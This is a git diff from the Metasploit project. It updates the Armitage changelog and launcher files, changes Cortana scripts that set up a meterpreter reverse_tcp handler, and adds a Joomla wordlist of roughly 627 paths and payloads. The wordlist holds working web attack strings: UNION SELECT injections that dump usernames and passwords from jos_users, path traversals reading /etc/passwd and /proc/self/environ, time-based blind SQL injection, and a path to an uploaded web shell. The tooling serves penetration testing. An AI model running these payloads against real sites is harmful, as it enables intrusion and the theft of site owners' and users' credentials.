diff --git a/.travis.yml b/.travis.yml index 6411d11c22..6b74b25154 100644 --- a/.travis.yml +++ b/.travis.yml @@ -6,3 +6,5 @@ rvm: notifications: irc: "irc.freenode.org#msfnotify" +git: + depth: 1 diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index 5ccd4ac15a..153f8f95c0 100755 Binary files a/data/armitage/armitage.jar and b/data/armitage/armitage.jar differ diff --git a/data/armitage/cortana.jar b/data/armitage/cortana.jar index 28f15b5fd1..94bebc6eac 100644 Binary files a/data/armitage/cortana.jar and b/data/armitage/cortana.jar differ diff --git a/data/armitage/whatsnew.txt b/data/armitage/whatsnew.txt index 5ea39884dd..c1e03e579b 100755 --- a/data/armitage/whatsnew.txt +++ b/data/armitage/whatsnew.txt @@ -1,6 +1,32 @@ Armitage Changelog ================== +23 Jan 13 (tested against msf 16351) +--------- +- Added helpers to set EXE::Custom and EXE::Template options. +- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts +- Cleaned up Armitage -> SOCKS Proxy job management code. The code to + check if a proxy server is up was deadlock prone. Removed it. +- Starting SOCKS Proxy module now opens a tab displaying the module + start process. An event is posted to the event log too. +- Created an option helper to select credentials for SMBUser, SMBPass, + USERNAME, and PASSWORD. +- Added a feature to label hosts. A label will show up in its own column + in table view or below all info in graph view. Any team member may + change a label through [host] -> host -> Set Label. You may also use + dynamic workspaces to show hosts with certain labels attached. +- Fixed bad things happening when connecting Armitage to 'localhost' and + not '127.0.0.1'. +- Screenshots and Webcam shots are now centered in their tab. +- Added an alternate .bat file to start msfrpcd on Windows in the + Metasploit 4.5 installer's environment. +- Added a color-style for [!] warning messages + +Cortana Updates (for scripters) +-------- +- &handler function now works as advertised. +- Cortana now avoids use of core.setg + 4 Jan 13 (tested against msf 16252) -------- - Added a helper to set REXE option diff --git a/data/wordlists/joomla.txt b/data/wordlists/joomla.txt new file mode 100755 index 0000000000..b1e651d504 --- /dev/null +++ b/data/wordlists/joomla.txt @@ -0,0 +1,627 @@ +&controller=../../../../../../../../../../../../[LFI]%00 +?1.5.10-x +?1.5.11-x-http_ref +?1.5.11-x-php-s3lf +?1.5.3-path-disclose +?1.5.3-spam +?1.5.8-x +?1.5.9-x +?j1012-fixate-session +?option=com_mysms&Itemid=0&task=phonebook +Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png +admin/ +administrator/ +administrator/components/ +administrator/components/com_a6mambocredits/ +administrator/components/com_a6mambohelpdesk/ +administrator/components/com_admin/admin.admin.html.php +administrator/components/com_astatspro/refer.php +administrator/components/com_bayesiannaivefilter/ +administrator/components/com_chronocontact/excelwriter/PPS/File.php +administrator/components/com_colophon/ +administrator/components/com_colorlab/ +administrator/components/com_comprofiler/ +administrator/components/com_comprofiler/plugin.class.php +administrator/components/com_cropimage/admin.cropcanvas.php +administrator/components/com_extplorer/ +administrator/components/com_feederator/includes/tmsp/add_tmsp.php +administrator/components/com_googlebase/ +administrator/components/com_installer +administrator/components/com_jcs/ +administrator/components/com_jim/ +administrator/components/com_jjgallery/ +administrator/components/com_joom12pic/ +administrator/components/com_joomla-visites/ +administrator/components/com_joomla_flash_uploader/ +administrator/components/com_joomlaflashfun/ +administrator/components/com_joomlaradiov5/ +administrator/components/com_jpack/ +administrator/components/com_jreactions/ +administrator/components/com_juser/ +administrator/components/com_admin/ +administrator/components/com_kochsuite / +administrator/components/com_linkdirectory/ +administrator/components/com_livechat/getSavedChatRooms.php +administrator/components/com_livechat/xmlhttp.php +administrator/components/com_lurm_constructor/admin.lurm_constructor.php +administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php"); +administrator/components/com_mambelfish/ +administrator/components/com_mgm/ +administrator/components/com_mmp/help.mmp.php +administrator/components/com_mosmedia/ +administrator/components/com_multibanners/extadminmenus.class.php +administrator/components/com_panoramic/ +administrator/components/com_peoplebook/param.peoplebook.php +administrator/components/com_phpshop/toolbar.phpshop.html.php +administrator/components/com_remository/admin.remository.php +administrator/components/com_serverstat/install.serverstat.php +administrator/components/com_simpleswfupload/uploadhandler.php"); +administrator/components/com_swmenupro/ +administrator/components/com_treeg/ +administrator/components/com_uhp/ +administrator/components/com_uhp2/ +administrator/components/com_webring/ +administrator/components/com_wmtgallery/ +administrator/components/com_wmtportfolio/ +administrator/components/com_x-shop/ +administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ +administrator/index.php?option=com_searchlog&act=log +ajaxim/ +akocomments.php +cart?Itemid=[SQLi] +component/com__brightweblinks/ +component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 +component/osproperty/?task=agent_register +component/quran/index.php?option=com_quran&action=viewayat&surano= +components/com_ clickheat/ +components/com_5starhotels/ +components/com_Jambook/jambook.php +components/com_a6mambocredits/ +components/com_a6mambohelpdesk/ +components/com_ab_gallery/ +components/com_acajoom/ +components/com_acctexp/ +components/com_aclassf/ +components/com_activities/ +components/com_actualite/ +components/com_admin/admin.admin.html.php +components/com_advancedpoll/ +components/com_agora/ +components/com_agoragroup/ +components/com_ajaxchat/ +components/com_akobook/ +components/com_akocomment/ +components/com_akogallery +components/com_alberghi/ +components/com_allhotels/ +components/com_alphacontent/ +components/com_altas/ +components/com_amocourse/ +components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php +components/com_articles/ +components/com_artist/ +components/com_artlinks/ +components/com_asortyment/ +components/com_astatspro/ +components/com_awesom/ +components/com_babackup/ +components/com_banners/ +components/com_bayesiannaivefilter/ +components/com_be_it_easypartner/ +components/com_beamospetition/ +components/com_biblestudy/ +components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_blog/ +components/com_bookflip/ +components/com_bookjoomlas/ +components/com_booklibrary/ +components/com_books/ +components/com_bsadv/ +components/com_bsq_sitestats/ +components/com_bsq_sitestats/external/rssfeed.php +components/com_bsqsitestats/ +components/com_calendar/ +components/com_camelcitydb2/ +components/com_candle/ +components/com_casino_blackjack/ +components/com_casino_videopoker/ +components/com_casinobase/ +components/com_catalogproduction/ +components/com_catalogshop/ +components/com_category/ +components/com_cgtestimonial/video.php?url="> +components/com_chronocontact/excelwriter/PPS/File.php +components/com_cinema/ +components/com_clasifier/ +components/com_classifieds/ +components/com_clickheat/ +components/com_cloner/ +components/com_cmimarketplace/ +components/com_cms/ +components/com_colophon/ +components/com_colorlab/ +components/com_competitions/ +components/com_comprofiler/ +components/com_comprofiler/plugin.class.php +components/com_contactinfo/ +components/com_content/ +components/com_cpg/cpg.php +components/com_cropimage/admin.cropcanvas.php +components/com_custompages/ +components/com_cx/ +components/com_d3000/ +components/com_dadamail/ +components/com_dailymessage/ +components/com_datsogallery/ +components/com_dbquery/ +components/com_detail/ +components/com_digistore/ +components/com_directory/ +components/com_djiceshoutbox/ +components/com_doc/ +components/com_downloads/ +components/com_ds-syndicate/ +components/com_dtregister/ +components/com_dv/externals/phpupload/upload.php"); +components/com_easybook/ +components/com_emcomposer/ +components/com_equotes/ +components/com_estateagent/ +components/com_eventing/ +components/com_eventlist/ +components/com_events/ +components/com_ewriting/ +components/com_expose/uploadimg.php +components/com_expshop/ +components/com_extcalendar/ +components/com_extcalendar/cal_popup.php?extmode=view&extid= +components/com_extcalendar/extcalendar.php +components/com_extended_registration/registration_detailed.inc.php +components/com_extplorer/ +components/com_ezine/ +components/com_ezstore/ +components/com_facileforms/ +components/com_fantasytournament/ +components/com_faq/ +components/com_feederator/includes/tmsp/add_tmsp.php +components/com_filebase/ +components/com_filiale/ +components/com_flashfun/ +components/com_flashmagazinedeluxe/ +components/com_flippingbook/ +components/com_flyspray/startdown.php +components/com_fm/fm.install.php +components/com_foevpartners/ +components/com_football/ +components/com_formtool/ +components/com_forum/ +components/com_fq/ +components/com_fundraiser/ +components/com_galeria/ +components/com_galleria/galleria.html.php +components/com_gallery/ +components/com_game/ +components/com_gameq/ +components/com_garyscookbook/ +components/com_genealogy/ +components/com_geoboerse/ +components/com_gigcal/ +components/com_gmaps/ +components/com_googlebase/ +components/com_gsticketsystem/ +components/com_guide/ +components/com_hashcash/server.php +components/com_hbssearch/ +components/com_hello_world/ +components/com_hotproperties/ +components/com_hotproperty/ +components/com_hotspots/ +components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php +components/com_hwdvideoshare/ +components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); +components/com_ice/ +components/com_idoblog/ +components/com_idvnews/ +components/com_ignitegallery/ +components/com_ijoomla_archive/ +components/com_ijoomla_rss/ +components/com_inter/ +components/com_ionfiles/ +components/com_is/ +components/com_ixxocart/ +components/com_jabode/ +components/com_jashowcase/ +components/com_jb2/ +components/com_jce/ +components/com_jcs/ +components/com_jd-wiki/ +components/com_jd-wp/ +components/com_jim/ +components/com_jjgallery/ +components/com_jmovies/ +components/com_jobline/ +components/com_jombib/ +components/com_joobb/ +components/com_jooget/ +components/com_joom12pic/ +components/com_joomla-visites/ +components/com_joomla_flash_uploader/ +components/com_joomlaboard/ +components/com_joomladate/ +components/com_joomlaflashfun/ +components/com_joomlalib/ +components/com_joomlaradiov5/ +components/com_joomlavvz/ +components/com_joomlaxplorer/ +components/com_joomloads/ +components/com_joomradio/ +components/com_joomtracker/ +components/com_joovideo/ +components/com_jotloader/ +components/com_journal/ +components/com_jpack/ +components/com_jpad/ +components/com_jreactions/ +components/com_jreviews/scripts/xajax.inc.php +components/com_jumi/ +components/com_juser/ +components/com_jvideo/ +components/com_k2/ +components/com_kbase/ +components/com_knowledgebase/fckeditor/fckeditor.js +components/com_kochsuite / +components/com_kunena/ +components/com_letterman/ +components/com_lexikon/ +components/com_linkdirectory/ +components/com_listoffreeads/ +components/com_livechat/getSavedChatRooms.php +components/com_livechat/xmlhttp.php +components/com_liveticker/ +components/com_lm/ +components/com_lmo/ +components/com_loudmounth/includes/abbc/abbc.class.php +components/com_loudmouth/ +components/com_lowcosthotels/ +components/com_lurm_constructor/admin.lurm_constructor.php +components/com_mad4joomla/ +components/com_madeira/img.php +components/com_maianmusic/ +components/com_mailarchive/ +components/com_mailto/ +components/com_mambatstaff/mambatstaff.php +components/com_mambelfish/ +components/com_mambospgm/ +components/com_mambowiki/MamboLogin.php +components/com_marketplace/ +components/com_mcquiz/ +components/com_mdigg/ +components/com_media_library/ +components/com_mediaslide/ +components/com_mezun/ +components/com_mgm/ +components/com_minibb/ +components/com_misterestate/ +components/com_mmp/help.mmp.php +components/com_model/ +components/com_moodle/moodle.php +components/com_moofaq/ +components/com_mosmedia/ +components/com_mospray/scripts/admin.php +components/com_mosres/ +components/com_most/ +components/com_mp3_allopass/ +components/com_mtree/ +components/com_mtree/img/listings/o/{id}.php +components/com_multibanners/extadminmenus.class.php +components/com_myalbum/ +components/com_mycontent/ +components/com_mydyngallery/ +components/com_mygallery/ +components/com_n-forms/ +components/com_na_content/ +components/com_na_mydocs/ +components/com_na_newsdescription/ +components/com_na_qforms/ +components/com_neogallery/ +components/com_neorecruit/ +components/com_neoreferences/ +components/com_netinvoice/ +components/com_news/ +components/com_news_portal/ +components/com_newsflash/ +components/com_nfn_addressbook/ +components/com_nicetalk/ +components/com_noticias/ +components/com_omnirealestate/ +components/com_omphotogallery/ +components/com_ongumatimesheet20/ +components/com_onlineflashquiz/ +components/com_ownbiblio/ +components/com_panoramic/ +components/com_paxgallery/ +components/com_paxxgallery/ +components/com_pcchess/ +components/com_pcchess/include.pcchess.php +components/com_pccookbook/ +components/com_pccookbook/pccookbook.php +components/com_peoplebook/param.peoplebook.php +components/com_performs/ +components/com_philaform/ +components/com_phocadocumentation/ +components/com_php/ +components/com_phpshop/toolbar.phpshop.html.php +components/com_pinboard/ +components/com_pms/ +components/com_poll/ +components/com_pollxt/ +components/com_ponygallery/ +components/com_portafolio/ +components/com_portfol/ +components/com_prayercenter/ +components/com_pro_desk/ +components/com_prod/ +components/com_productshowcase/ +components/com_profiler/ +components/com_projectfork/ +components/com_propertylab/ +components/com_puarcade/ +components/com_publication/ +components/com_quiz/ +components/com_rapidrecipe/ +components/com_rdautos/ +components/com_realestatemanager/ +components/com_recly/ +components/com_referenzen/ +components/com_rekry/ +components/com_remository/admin.remository.php +components/com_remository_files/file_image_14/1276100016shell.php +components/com_reporter/processor/reporter.sql.php +components/com_resman/ +components/com_restaurante/ +components/com_ricette/ +components/com_rsfiles/ +components/com_rsgallery/ +components/com_rsgallery2/ +components/com_rss/ +components/com_rssreader/ +components/com_rssxt/ +components/com_rwcards/ +components/com_school/ +components/com_search/ +components/com_sebercart/getPic.php?p=[LFD]%00 +components/com_securityimages/ +components/com_sef/ +components/com_seminar/ +components/com_serverstat/install.serverstat.php +components/com_sg/ +components/com_simple_review/ +components/com_simpleboard/ +components/com_simplefaq/ +components/com_simpleshop/ +components/com_sitemap/sitemap.xml.php +components/com_slideshow/ +components/com_smf/ +components/com_smf/smf.php +components/com_swmenupro/ +components/com_team/ +components/com_tech_article/ +components/com_thopper/ +components/com_thyme/ +components/com_tickets/ +components/com_tophotelmodule/ +components/com_tour_toto/ +components/com_trade/ +components/com_uhp/ +components/com_uhp2/ +components/com_user/controller.php +components/com_users/ +components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php +components/com_vehiclemanager/ +components/com_versioning / +components/com_videodb/core/videodb.class.xml.php +components/com_virtuemart/ +components/com_volunteer/ +components/com_vr/ +components/com_waticketsystem/ +components/com_webhosting/ +components/com_weblinks/ +components/com_webring/ +components/com_wmtgallery/ +components/com_wmtportfolio/ +components/com_x-shop/ +components/com_xevidmegahd/ +components/com_xewebtv/ +components/com_xfaq/ +components/com_xgallery/helpers/img.php?file= +components/com_xsstream-dm/ +components/com_ynews/ +components/com_yvcomment/ +components/com_zoom/classes/ +components/mod_letterman/ +components/remository/ +eXtplorer/ +easyblog/entry/uncategorized +extplorer/ +components/com_mtree/img/listings/o/{id}.php where {id} +includes/joomla.php +index.php/404' +index.php/?option=com_question&catID=21' and+1=0 union all +index.php/image-gallery/">/25-koala +index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 +index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view +index.php?option=com_aardvertiser&cat_name=conf&task=<= +index.php?option=com_aardvertiser&task= +index.php?option=com_abc&view=abc&letter=AS§ionid=' +index.php?option=com_advert&id=36' +index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- +index.php?option=com_alfurqan15x&action=viewayat&surano= +index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version +index.php?option=com_annonces&view=edit&Itemid=1 +index.php?option=com_articleman&task=new +index.php?option=com_bbs&bid=-1 +index.php?option=com_beamospetition&startpage=3&pet=- +index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users- +index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27 +index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1 +index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-- +index.php?option=com_chronoconnectivity&itemid=1 +index.php?option=com_chronocontact&itemid=1 +index.php?option=com_cinema&Itemid=S@BUN&func=detail&id= +index.php?option=com_clantools&squad=1+ +index.php?option=com_clantools&task=clanwar&showgame=1+ +index.php?option=com_commedia&format=raw&task=image&pid=4&id=964' +index.php?option=com_commedia&task=page&commpid=21 +index.php?option=com_connect&view=connect&controller= +index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../ +index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_dioneformwizard&controller=[LFI]%00 +index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1 +index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 +index.php?option=com_easyfaq&Itemid=1&task=view&gid= +index.php?option=com_easyfaq&catid=1&task=view&id=-2527+ +index.php?option=com_easyfaq&task=view&contact_id= +index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= +index.php?option=com_equipment&task=components&id=45&sec_men_id= +index.php?option=com_equipment&view=details&id= +index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli] +index.php?option=com_etree&view=displays&layout=category&id=[SQL] +index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] +index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 +index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- +index.php?option=com_filecabinet&task=download&cid[]=7 +index.php?option=com_firmy&task=section_show_set&Id=-1 +index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R +index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= +index.php?option=com_graphics&controller= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= +index.php?option=com_huruhelpdesk&view=detail +index.php?option=com_huruhelpdesk&view=detail&cid[0]= +index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 +index.php?option=com_iproperty&view=agentproperties&id= +index.php?option=com_jacomment&view= +index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 +index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_jcommunity&controller=members&task=1' +index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13 +index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2 +index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2 +index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00 +index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_jfuploader&Itemid= +index.php?option=com_jgen&task=view&id= +index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00 +index.php?option=com_jimtawl&Itemid=12&task= +index.php?option=com_jmarket&controller=product&task=1' +index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1' +index.php?option=com_jomdirectory&task=search&type=111+ +index.php?option=com_joomdle&view=detail&cat_id=1&course_id= +index.php?option=com_joomla_flash_uploader&Itemid=1 +index.php?option=com_joomleague&func=showNextMatch&p=[sqli] +index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli] +index.php?option=com_joomtouch&controller= +index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00 +index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00 +index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users +index.php?option=com_jstore&controller=product-display&task=1' +index.php?option=com_jsubscription&controller=subscription&task=1' +index.php?option=com_jtickets&controller=ticket&task=1' +index.php?option=com_konsultasi&act=detail&sid= +index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en +index.php?option=com_kunena&func=userlist&search= +index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' +index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users-- +index.php?option=com_matamko&controller= +index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm +index.php?option=com_neorecruit&task=offer_view&id= +index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- +index.php?option=com_noticeboard&controller= +index.php?option=com_obsuggest&controller= +index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- +index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- +index.php?option=com_oziogallery&Itemid= +index.php?option=com_page&id=53 +index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection] +index.php?option=com_phocagallery&view=categories&Itemid= +index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_php&file=../../../../../../../../../../etc/passwd +index.php?option=com_php&file=../images/phplogo.jpg +index.php?option=com_php&file=../js/ie_pngfix.js +index.php?option=com_ponygallery&Itemid=[sqli] +index.php?option=com_products&catid=-1 +index.php?option=com_products&id=-1 +index.php?option=com_products&product_id=-1 +index.php?option=com_products&task=category&catid=-1 +index.php?option=com_properties&task=agentlisting&aid= +index.php?option=com_qcontacts&Itemid=1' +index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts +index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_restaurantguide&view=country&id='&Itemid=69 +index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' +index.php?option=com_seyret&view= +index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- +index.php?option=com_smartsite&controller= +index.php?option=com_spa&view=spa_product&cid= +index.php?option=com_spidercalendar +index.php?option=com_spidercalendar&date=1' +index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_staticxt&staticfile=test.php&id=1923 +index.php?option=com_szallasok&mode=8&id=25 (SQL) +index.php?option=com_tag&task=tag&tag= +index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users-- +index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users +index.php?option=com_ultimateportfolio&controller= +index.php?option=com_users&view=registration +index.php?option=com_virtuemart&page=account.index&keyword=[sqli] +index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_x-shop&action=artdetail&idd=' +index.php?option=com_x-shop&action=artdetail&idd='[SQLi] +index.php?option=com_xcomp&controller=../../[LFI]%00 +index.php?option=com_xvs&controller=../../[LFI]%00 +index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users-- +index.php?option=com_yjcontactus&view= +index.php?option=com_youtube&id_cate=4 +index.php?option=com_zina&view=zina&Itemid=9 +index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id= +index.php?search=NoGe&option=com_esearch&searchId= +index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube +index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users-- +js/index.php?option=com_socialads&view=showad&Itemid=94 +libraries/joomla/utilities/compat/php50x.php +libraries/pcl/pcltar.php +libraries/phpmailer/phpmailer.php +libraries/phpxmlrpc/xmlrpcs.php +modules/mod_artuploader/upload.php"); +modules/mod_as_category.php +modules/mod_calendar.php +modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] +modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream"); +modules/mod_jfancy/script.php"); +modules/mod_ppc_simple_spotlight/elements/upload_file.php +modules/mod_ppc_simple_spotlight/img/ +modules/mod_pxt/ +modules/mod_quick_question.php +modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0 +patch/makedown.php?arquivo=../../../../etc/passwd +plugins/content/efup_files/helper.php"); +plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> +plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ +plugins/editors/xstandard/attachmentlibrary.php +print.php?task=person&id=36 and 1=1 +templates/be2004-2/ +templates/ja_purity/ +wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-- +web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' diff --git a/external/source/armitage/build.xml b/external/source/armitage/build.xml index b9d4ca043e..f5bac934dc 100644 --- a/external/source/armitage/build.xml +++ b/external/source/armitage/build.xml @@ -16,6 +16,8 @@ depend="yes" debug="true" optimize="yes" + target="1.6" + source="1.6" includeantruntime="fuckno" > diff --git a/external/source/armitage/resources/about.html b/external/source/armitage/resources/about.html index 85c4fe5dbb..e19056effa 100644 --- a/external/source/armitage/resources/about.html +++ b/external/source/armitage/resources/about.html @@ -3,7 +3,7 @@

Armitage 1.45

An attack management tool for Metasploit® -
Release: 4 Jan 13

+
Release: 23 Jan 13


Developed by:

diff --git a/external/source/armitage/resources/msfconsole.style b/external/source/armitage/resources/msfconsole.style index a8aa516621..3d927f37a9 100644 --- a/external/source/armitage/resources/msfconsole.style +++ b/external/source/armitage/resources/msfconsole.style @@ -4,6 +4,7 @@ ^msf (.*?)\((.*?)\) > \umsf\u $1(\c4$2\o) > ^\[\*\] (.*) \cC[*]\o $1 ^\[\+\] (.*) \c9[+]\o $1 +^\[\!\] (.*) \c8[!]\o $1 ^\[\-\] (.*) \c4[-]\o $1 ^ =\[ (.*) =[\c7 $1 ^(=[=\s]+) \cE$1 diff --git a/external/source/armitage/resources/msfrpcd_new.bat b/external/source/armitage/resources/msfrpcd_new.bat new file mode 100644 index 0000000000..b1bcb31a21 --- /dev/null +++ b/external/source/armitage/resources/msfrpcd_new.bat @@ -0,0 +1,12 @@ +@echo off +set BASE=$$BASE$$..\..\ +cd "%BASE%" +set PATH=%BASE%ruby\bin;%BASE%java\bin;%BASE%tools;%BASE%nmap;%BASE%postgresql\bin;%PATH% +IF NOT EXIST "%BASE%java" GOTO NO_JAVA +set JAVA_HOME="%BASE%java" +:NO_JAVA +set MSF_DATABASE_CONFIG="%BASE%apps\pro\ui\config\database.yml" +set MSF_BUNDLE_GEMS=0 +set BUNDLE_GEMFILE=%BASE%apps\pro\ui\Gemfile +cd "%BASE%apps\pro\msf3" +rubyw msfrpcd -a 127.0.0.1 -U $$USER$$ -P $$PASS$$ -S -f -p $$PORT$$ diff --git a/external/source/armitage/scripts-cortana/cortanadb.sl b/external/source/armitage/scripts-cortana/cortanadb.sl index 97eae7e56b..8b1842f5fc 100644 --- a/external/source/armitage/scripts-cortana/cortanadb.sl +++ b/external/source/armitage/scripts-cortana/cortanadb.sl @@ -42,8 +42,13 @@ sub c_client { sub setupHandlers { find_job("Exploit: multi/handler", { if ($1 == -1) { + # set LPORT for the user... + local('$c'); + $c = call($client, "console.allocate")['id']; + call($client, "console.write", $c, "setg LPORT " . randomPort() . "\n"); + call($client, "console.release", $c); + # setup a handler for meterpreter - call($client, "core.setg", "LPORT", randomPort()); call($client, "module.execute", "exploit", "multi/handler", %( PAYLOAD => "windows/meterpreter/reverse_tcp", LHOST => "0.0.0.0", @@ -55,7 +60,7 @@ sub setupHandlers { sub main { global('$client $mclient'); - local('%r $exception'); + local('%r $exception $lhost $temp $c'); setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L); @@ -81,8 +86,24 @@ sub main { # setup second thread. %r = call($client, "armitage.validate", $user, $pass, $null, "armitage", 120326); + # resolve lhost.. + $c = call($client, "console.allocate")['id']; + call($client, "console.write", $c, "setg LHOST\n"); + while ($lhost eq "") { + $temp = call($client, "console.read", $c)['data']; + if (["$temp" startsWith: "LHOST => "]) { + $lhost = substr(["$temp" trim], 9); + } + else { + # this shouldn't happen because having LHOST set is a precondition + # for Cortana to connect to a team server. + sleep(1000); + } + } + call($client, "console.release", $c); + # pass some objects back yo. - 